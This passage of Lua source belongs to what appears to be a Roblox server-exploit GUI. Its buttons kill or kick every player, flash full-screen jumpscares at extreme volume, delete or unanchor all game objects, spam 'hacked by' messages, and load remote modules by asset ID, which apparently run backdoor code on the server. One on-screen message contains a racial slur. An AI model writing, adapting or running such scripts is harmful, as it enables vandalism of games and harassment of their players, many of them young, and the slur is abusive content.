		for i,v in pairs(game.Players:GetPlayers()) do
			if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then
				spawn(function()
					local newgui = Instance.new("ScreenGui",v.PlayerGui)
					newgui.Name = "Screamer"
					local newimage = Instance.new("ImageLabel",newgui)
					newimage.Image = "http://www.roblox.com/asset/?id=9018233362"
					newimage.Size = UDim2.new(1,1,1,1)
					local s = Instance.new("Sound",newgui)
					s.SoundId = "rbxassetid://9069609200"
					s.Volume = 9999999999999999999999999999999999999
					s.Looped = true
					s:Play()
					print("Screamed "..v.Name)
					while wait(9) do
	
						newimage.Parent:Destroy()
	
					end
				end)
			end
		end
	end)
end
coroutine.wrap(FKAS_fake_script)()
local function PTJO_fake_script() -- kill.Script 
	local script = Instance.new('Script', kill)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		for i,v in pairs(game.Players:GetPlayers()) do
			v.Character.Humanoid.Health = 0
		end
	end)
	
	
	-- script by budaloaf [butterloaf] a.k.a AMBATUKAM OH SHITTTTTTTTTTTTTT
end
coroutine.wrap(PTJO_fake_script)()
local function DUFNO_fake_script() -- music.Script 
	local script = Instance.new('Script', music)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function onClick()
		local tubers93		= Instance.new("Sound")
		tubers93.Parent		= game:GetService("Workspace")
		tubers93.SoundId		= "rbxassetid://6942391979"
		tubers93.Playing		= true
		tubers93.Looped		= true
		tubers93.Pitch      = 0.9
		tubers93.Volume		= 10
	
	end
	
	script.Parent.MouseButton1Down:connect(onClick)
end
coroutine.wrap(DUFNO_fake_script)()
local function KBVIOT_fake_script() -- musicbypas.Script 
	local script = Instance.new('Script', musicbypas)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function onClick()
		local tubers93		= Instance.new("Sound")
		tubers93.Parent		= game:GetService("Workspace")
		tubers93.SoundId		= "rbxassetid://5356466111"
		tubers93.Playing		= true
		tubers93.Looped		= true
		tubers93.Pitch      = 0.9
		tubers93.Volume		= 10
	
	end
	
	script.Parent.MouseButton1Down:connect(onClick)
end
coroutine.wrap(KBVIOT_fake_script)()
local function QMANUKX_fake_script() -- parts.Script 
	local script = Instance.new('Script', parts)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in pairs(game.Players:GetChildren()) do
			emit = Instance.new("ParticleEmitter")
			emit.Parent = v.Character.Head
			emit.Texture = "http://www.roblox.com/asset/?id=9698929683"
			emit.VelocitySpread = 100000
		end
		end)
end
coroutine.wrap(QMANUKX_fake_script)()
local function CONCESU_fake_script() -- r6.Script 
	local script = Instance.new('Script', r6)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)
		require(3436957371):r6(plr.name)
	end)
	
end
coroutine.wrap(CONCESU_fake_script)()
local function XEGE_fake_script() -- r6.LocalScript 
	local script = Instance.new('LocalScript', r6)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(XEGE_fake_script)()
local function SEUQR_fake_script() -- rain.Script 
	local script = Instance.new('Script', rain)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Down:Connect(function()
		while true do
			part = Instance.new("Part")
			part.Position =  Vector3.new(math.random(-500,500),math.random(1,500),math.random(-500,500))
			part.Parent = game.Workspace
			part.BrickColor = BrickColor.new("Really red")
			fire = Instance.new("Fire")
			fire.Size = 99
			fire.Parent = part
			wait(1)
		end
	end)
end
coroutine.wrap(SEUQR_fake_script)()
local function AUVT_fake_script() -- rain.LocalScript 
	local script = Instance.new('LocalScript', rain)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(AUVT_fake_script)()
local function YVBULUJ_fake_script() -- realm.Script 
	local script = Instance.new('Script', realm)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)
		require(12165892882):k00p(plr.name)
	end)
	
end
coroutine.wrap(YVBULUJ_fake_script)()
local function WCAARNQ_fake_script() -- realm.LocalScript 
	local script = Instance.new('LocalScript', realm)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(WCAARNQ_fake_script)()
local function AVQKDDP_fake_script() -- shut.Script 
	local script = Instance.new('Script', shut)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Down:connect(function()
		for i, players in pairs(game.Players:GetChildren()) do
			players:Kick("Teh Game Iz Fuked Up!!!!111")
		end
	end)
	
end
coroutine.wrap(AVQKDDP_fake_script)()
local function NLXVL_fake_script() -- sky.Script 
	local script = Instance.new('Script', sky)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function click()
		s = Instance.new("Sky")
		s.Name = "Sky"
		s.Parent = game.Lighting
		s.SkyboxBk = "http://www.roblox.com/asset/?id=9422866248"
		s.SkyboxDn = "http://www.roblox.com/asset/?id=9422866248"
		s.SkyboxFt = "http://www.roblox.com/asset/?id=9422866248"
		s.SkyboxLf = "http://www.roblox.com/asset/?id=9422866248"
		s.SkyboxRt = "http://www.roblox.com/asset/?id=9422866248"
		s.SkyboxUp = "http://www.roblox.com/asset/?id=9422866248"
		game.Lighting.TimeOfDay = 12
	end
	
	script.Parent.MouseButton1Down:connect(click)
end
coroutine.wrap(NLXVL_fake_script)()
local function XLGRMV_fake_script() -- toad.Script 
	local script = Instance.new('Script', toad)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		wait(1)
		math.randomseed(tick() % 1 * 1e6)
		sky = coroutine.create(function()
			while wait(0.3) do
				s = Instance.new("Sky",game.Lighting)
				s.SkyboxBk,s.SkyboxDn,s.SkyboxFt,s.SkyboxLf,s.SkyboxRt,s.SkyboxUp = "rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408"
				s.CelestialBodiesShown = true
			end
		end)
	
	
		local m = Instance.new("Hint", game.workspace)
		m.Text = " GET TOADROASTED NIGGAS!"
	
		del = coroutine.create(function()
			while wait(0.3) do
				for i,v in pairs(workspace:GetChildren()) do
					if v:IsA("Model") then
						v:Destroy()
					end
				end
			end
		end)
	
	
	
		for i,v in pairs(game.Players:GetChildren()) do
			v.Character.Archivable = true
		end
	
		noises = {'rbxassetid://230287740','rbxassetid://271787597','rbxassetid://153752123','rbxassetid://271787503'}
	
		sound = coroutine.create(function()
			a = Instance.new("Sound",workspace)
			a.SoundId = "rbxassetid://6942391979"
			a.Name = "RAINING MEN"
			a.Volume = 58359
			a.Looped = true
			a:Play()
			while wait(0.2) do
				rainin = workspace:FindFirstChild("RAINING MEN")
				if not rainin then
					a = Instance.new("Sound",workspace)
					a.SoundId = "rbxassetid://6942391979"
					a.Name = "RAINING MEN"
					a.Volume = 58359
					a.Looped = true
					a:Play()
				end
			end
		end)
	
		msg = coroutine.create(function()
			while wait(0.4) do
				msg = Instance.new("Message",workspace)
				msg.Text = "Get toadroasted by k00pkidd Bitch"
				wait(0.4)
				msg:Destroy()
			end
		end) 
	
	
		rain = coroutine.create(function()
			while wait(10 % 1 * 1e2) do
				part = Instance.new("Part",workspace)
				part.Name = "Toad"
	
				mesh = Instance.new("SpecialMesh",part)
	
				sound = Instance.new("Sound",workspace)
	
				part.CanCollide = false
				part.Size = Vector3.new(440,530,380)
				part.Position = Vector3.new(math.random(-3000,1000),math.random(1,3000),math.random(-3000,3000))
	
				sound.SoundId = noises[math.random(1,#noises)]
				sound:Play()
				sound.Ended:connect(function()
					sound:Destroy()
				end)
	
	
				mesh.MeshType = "FileMesh"
				mesh.MeshId = "rbxassetid://7234998844"
				mesh.TextureId = "rbxassetid://1009824086"
			end
		end)
		coroutine.resume(sky)
		coroutine.resume(del)
		coroutine.resume(sound)
		coroutine.resume(msg)
		coroutine.resume(rain)
	end)
end
coroutine.wrap(XLGRMV_fake_script)()
local function CDIKP_fake_script() -- unanchor.Script 
	local script = Instance.new('Script', unanchor)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Down:Connect(function()
		for i,v in pairs(game.Workspace:GetDescendants()) do
			if v:IsA("BasePart") then	
				v.Anchored = false
			end
		end
	
	
		for i,v in pairs(game.ReplicatedStorage:GetDescendants()) do
			if v:IsA("BasePart") then
				v.Anchored = false
			end
		end
		
	
		for i,v in pairs(game.ReplicatedFirst:GetDescendants()) do
			if v:IsA("BasePart") then
				v.Anchored = false
			end
		end
	end)
end
coroutine.wrap(CDIKP_fake_script)()
local function QEDT_fake_script() -- musicbypas2.Script 
	local script = Instance.new('Script', musicbypas2)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function onClick()
		local tubers93		= Instance.new("Sound")
		tubers93.Parent		= game:GetService("Workspace")
		tubers93.SoundId		= "rbxassetid://7795812961"
		tubers93.Playing		= true
		tubers93.Looped		= true
		tubers93.Pitch      = 0.9
		tubers93.Volume		= 10
	
	end
	
	script.Parent.MouseButton1Down:connect(onClick)
end
coroutine.wrap(QEDT_fake_script)()
local function GXGUBID_fake_script() -- musicbypas3.Script 
	local script = Instance.new('Script', musicbypas3)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function onClick()
		local tubers93		= Instance.new("Sound")
		tubers93.Parent		= game:GetService("Workspace")
		tubers93.SoundId		= "rbxassetid://8894394467"
		tubers93.Playing		= true
		tubers93.Looped		= true
		tubers93.Pitch      = 0.9
		tubers93.Volume		= 100000000000000000000000
		tubers93.Distorted		= true
	end
	
	script.Parent.MouseButton1Down:connect(onClick)
end
coroutine.wrap(GXGUBID_fake_script)()
local function RKSBSC_fake_script() -- musicbypas4.Script 
	local script = Instance.new('Script', musicbypas4)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function onClick()
		local tubers93		= Instance.new("Sound")
		tubers93.Parent		= game:GetService("Workspace")
		tubers93.SoundId		= "rbxassetid://6435679021"
		tubers93.Playing		= true
		tubers93.Looped		= true
		tubers93.Pitch      = 0.9
		tubers93.Volume		= 100000000000000000000000
		tubers93.Distorted		= true
	end
	
	script.Parent.MouseButton1Down:connect(onClick)
end
coroutine.wrap(RKSBSC_fake_script)()
local function PIPXLZ_fake_script() -- musicbypas5.Script 
	local script = Instance.new('Script', musicbypas5)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function onClick()
		local tubers93		= Instance.new("Sound")
		tubers93.Parent		= game:GetService("Workspace")
		tubers93.SoundId		= "rbxassetid://5925731369"
		tubers93.Playing		= true
		tubers93.Looped		= true
		tubers93.Pitch      = 0.3
		tubers93.Volume		= 100000000000000000000000
		tubers93.Distorted		= true
	end
	
	script.Parent.MouseButton1Down:connect(onClick)
end
coroutine.wrap(PIPXLZ_fake_script)()
local function MHKNM_fake_script() -- shamsterky.Script 
	local script = Instance.new('Script', shamsterky)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function click()
		s = Instance.new("Sky")
		s.Name = "Sky"
		s.Parent = game.Lighting
		s.SkyboxBk = "http://www.roblox.com/asset/?id=12293485603"
		s.SkyboxDn = "http://www.roblox.com/asset/?id=12293485603"
		s.SkyboxFt = "http://www.roblox.com/asset/?id=12293485603"
		s.SkyboxLf = "http://www.roblox.com/asset/?id=12293485603"
		s.SkyboxRt = "http://www.roblox.com/asset/?id=12293485603"
		s.SkyboxUp = "http://www.roblox.com/asset/?id=12293485603"
		game.Lighting.TimeOfDay = 12
	end
	
	script.Parent.MouseButton1Down:connect(click)
end
coroutine.wrap(MHKNM_fake_script)()
local function XGSO_fake_script() -- dreemy.Script 
	local script = Instance.new('Script', dreemy)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function click()
		s = Instance.new("Sky")
		s.Name = "Sky"
		s.Parent = game.Lighting
		s.SkyboxBk = "http://www.roblox.com/asset/?id=9894999986"
		s.SkyboxDn = "http://www.roblox.com/asset/?id=9894999986"
		s.SkyboxFt = "http://www.roblox.com/asset/?id=9894999986"
		s.SkyboxLf = "http://www.roblox.com/asset/?id=9894999986"
		s.SkyboxRt = "http://www.roblox.com/asset/?id=9894999986"
		s.SkyboxUp = "http://www.roblox.com/asset/?id=9894999986"
		game.Lighting.TimeOfDay = 12
	end
	
	script.Parent.MouseButton1Down:connect(click)
end
coroutine.wrap(XGSO_fake_script)()
local function JCTJ_fake_script() -- eses.Script 
	local script = Instance.new('Script', eses)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		for i,v in pairs(game.Players:GetPlayers()) do
			if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then
				spawn(function()
					local newgui = Instance.new("ScreenGui",v.PlayerGui)
					newgui.Name = "Screamer"
					local newimage = Instance.new("ImageLabel",newgui)
					newimage.Image = "http://www.roblox.com/asset/?id=12299781290"
					newimage.Size = UDim2.new(1,1,1,1)
					local s = Instance.new("Sound",newgui)
					s.SoundId = "rbxassetid://8696985260"
					s.Volume = 9999999999999999999999999999999999999
					s.Looped = true
					s:Play()
					print("Screamed "..v.Name)
					while wait(9) do
	
						newimage.Parent:Destroy()
	
					end
				end)
			end
		end
	end)
end
coroutine.wrap(JCTJ_fake_script)()
local function STFIEE_fake_script() -- antileave.ServerEventHandler 
	local script = Instance.new('Script', antileave)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:connect(function()
		require(12507245664)()
	end)
end
coroutine.wrap(STFIEE_fake_script)()
-- nil.Client is disabled.
local function ANVQSN_fake_script() -- theme.Script 
	local script = Instance.new('Script', theme)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function onClick()
		local tubers93		= Instance.new("Sound")
		tubers93.Parent		= game:GetService("Workspace")
		tubers93.SoundId		= "rbxassetid://1839246711"
		tubers93.Playing		= true
		tubers93.Looped		= true
		tubers93.Pitch      = 0.9
		tubers93.Volume		= 100000000
		tubers93.Distortion = 1999999999
	
	end
	
	script.Parent.MouseButton1Down:connect(onClick)
end
coroutine.wrap(ANVQSN_fake_script)()
local function ZHMQBSC_fake_script() -- thomas.Script 
	local script = Instance.new('Script', thomas)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)
		require(8544809895).G(plr.name)
	end)
	
end
coroutine.wrap(ZHMQBSC_fake_script)()
local function NTRJQ_fake_script() -- thomas.LocalScript 
	local script = Instance.new('LocalScript', thomas)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(NTRJQ_fake_script)()
local function IMOYAEQ_fake_script() -- kick.Script 
	local script = Instance.new('Script', kick)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)
		require(12507628531).Kick(plr.name)
	end)
	
end
coroutine.wrap(IMOYAEQ_fake_script)()
local function CZXSATI_fake_script() -- kick.LocalScript 
	local script = Instance.new('LocalScript', kick)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(CZXSATI_fake_script)()
local function VMQN_fake_script() -- Destroy.LocalScript 
	local script = Instance.new('LocalScript', Destroy)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(VMQN_fake_script)()
local function BZEVX_fake_script() -- Destroy.Script 
	local script = Instance.new('Script', Destroy)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)
		require(12498503720)(plr.Name)
	end)
	
end
coroutine.wrap(BZEVX_fake_script)()
local function ROGVNTO_fake_script() -- gravityhammer.Script 
	local script = Instance.new('Script', gravityhammer)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)
		require(12012115295).load(plr.name)
	end)
	
end
coroutine.wrap(ROGVNTO_fake_script)()
local function ELJLBL_fake_script() -- gravityhammer.LocalScript 
	local script = Instance.new('LocalScript', gravityhammer)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(ELJLBL_fake_script)()
local function JNSKQAF_fake_script() -- kaax.Script 
	local script = Instance.new('Script', kaax)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		wait(1)
		math.randomseed(tick() % 1 * 1e6)
		sky = coroutine.create(function()
			while wait(0.3) do
				s = Instance.new("Sky",game.Lighting)
				s.SkyboxBk,s.SkyboxDn,s.SkyboxFt,s.SkyboxLf,s.SkyboxRt,s.SkyboxUp = "rbxassetid://12330950245","rbxassetid://12330950245","rbxassetid://12330950245","rbxassetid://12330950245","rbxassetid://12330950245","rbxassetid://12330950245"
				s.CelestialBodiesShown = true
			end
		end)
	
	
		local m = Instance.new("Hint", game.workspace)
		m.Text = " game got hacked by Kaax!!!"
	
		del = coroutine.create(function()
			while wait(0.3) do
				for i,v in pairs(workspace:GetChildren()) do
					if v:IsA("Model") then
						v:Destroy()
					end
				end
			end
		end)
	
	
	
		for i,v in pairs(game.Players:GetChildren()) do
			v.Character.Archivable = true
		end
	
		noises = {'rbxassetid://230287740','rbxassetid://271787597','rbxassetid://153752123','rbxassetid://271787503'}
	
		sound = coroutine.create(function()
			a = Instance.new("Sound",workspace)
			a.SoundId = "rbxassetid://6783714255"
			a.Name = "RAINING MEN"
			a.Volume = 58359
			a.Looped = true
			a:Play()
			while wait(0.2) do
				rainin = workspace:FindFirstChild("RAINING MEN")
				if not rainin then
					a = Instance.new("Sound",workspace)
					a.SoundId = "rbxassetid://6942391979"
					a.Name = "RAINING MEN"
					a.Volume = 58359
					a.Looped = true
					a:Play()
				end
			end
		end)
	
		msg = coroutine.create(function()
			while wait(0.4) do
				msg = Instance.new("Message",workspace)
				msg.Text = "Team KaaXploits, Join Today! [Remake By k00pkidd]"
				wait(0.4)
				msg:Destroy()
			end
		end) 
	
	
		rain = coroutine.create(function()
			while wait(10 % 1 * 1e2) do
				part = Instance.new("Part",workspace)
				part.Name = "Toad"
	
				mesh = Instance.new("SpecialMesh",part)
	
				sound = Instance.new("Sound",workspace)
	
				part.CanCollide = false
				part.Size = Vector3.new(440,530,380)
				part.Position = Vector3.new(math.random(-3000,1000),math.random(1,3000),math.random(-3000,3000))
	
				sound.SoundId = noises[math.random(1,#noises)]
				sound:Play()
				sound.Ended:connect(function()
					sound:Destroy()
				end)
	
	
				mesh.MeshType = "FileMesh"
				mesh.MeshId = "rbxassetid://3692134742"
				mesh.TextureId = "rbxassetid://3692134820"
			end
		end)
		coroutine.resume(sky)
		coroutine.resume(del)
		coroutine.resume(sound)
		coroutine.resume(msg)
		coroutine.resume(rain)
	end)
end
coroutine.wrap(JNSKQAF_fake_script)()
local function CMXFY_fake_script() -- musicbypas6.Script 
	local script = Instance.new('Script', musicbypas6)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function onClick()
		local tubers93		= Instance.new("Sound")
		tubers93.Parent		= game:GetService("Workspace")
		tubers93.SoundId		= "rbxassetid://6783714255"
		tubers93.Playing		= true
		tubers93.Looped		= true
		tubers93.Pitch      = 0.7
		tubers93.Volume		= 100000000000000000000000
		tubers93.Distorted		= true
	end
	
	script.Parent.MouseButton1Down:connect(onClick)
end
coroutine.wrap(CMXFY_fake_script)()
local function PNSQP_fake_script() -- k00pk00p.Script 
	local script = Instance.new('Script', k00pk00p)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)
		require(10090792515).load(plr.name)
	end)
	
end
coroutine.wrap(PNSQP_fake_script)()
local function DOZLHF_fake_script() -- k00pk00p.LocalScript 
	local script = Instance.new('LocalScript', k00pk00p)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(DOZLHF_fake_script)()
local function FDFF_fake_script() -- infYield.Script 
	local script = Instance.new('Script', infYield)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)
		require(4832971989)(plr.name)
	end)
	
end
coroutine.wrap(FDFF_fake_script)()
local function WROYSR_fake_script() -- infYield.LocalScript 
	local script = Instance.new('LocalScript', infYield)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.RemoteEvent:FireServer()
	end)
end
coroutine.wrap(WROYSR_fake_script)()
local function GILCXIF_fake_script() -- message.Script 
	local script = Instance.new('Script', message)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		local o = Instance.new("Message",workspace)
		o.Text = "This Game Just Got Hacked By Team k00pkidd XD"
		wait(10)
		o:Destroy()
	end)
end
coroutine.wrap(GILCXIF_fake_script)()
local function FYMJTWX_fake_script() -- Frame.Drag Gui Script 
	local script = Instance.new('LocalScript', Frame)
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	function dragify(Main)
	dragToggle = nil
	dragSpeed = 0.95 -- You can edit this.
	dragInput = nil
	dragStart = nil
	dragPos = nil
	
	function updateInput(input)
	Delta = input.Position - dragStart
	Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
	game:GetService("TweenService"):Create(Main, TweenInfo.new(.25), {Position = Position}):Play()
	end
	
	Main.InputBegan:Connect(function(input)
	if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then
	dragToggle = true
	dragStart = input.Position
	startPos = Main.Position
	input.Changed:Connect(function()
	if (input.UserInputState == Enum.UserInputState.End) then
	dragToggle = false
	end
	end)
	end
	end)
	
	Main.InputChanged:Connect(function(input)
	if (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
	dragInput = input
	end
	end)
	
	game:GetService("UserInputService").InputChanged:Connect(function(input)
	if (input == dragInput and dragToggle) then
	updateInput(input)
	end
	end)
	end
	
	dragify(script.Parent)
end
coroutine.wrap(FYMJTWX_fake_script)()
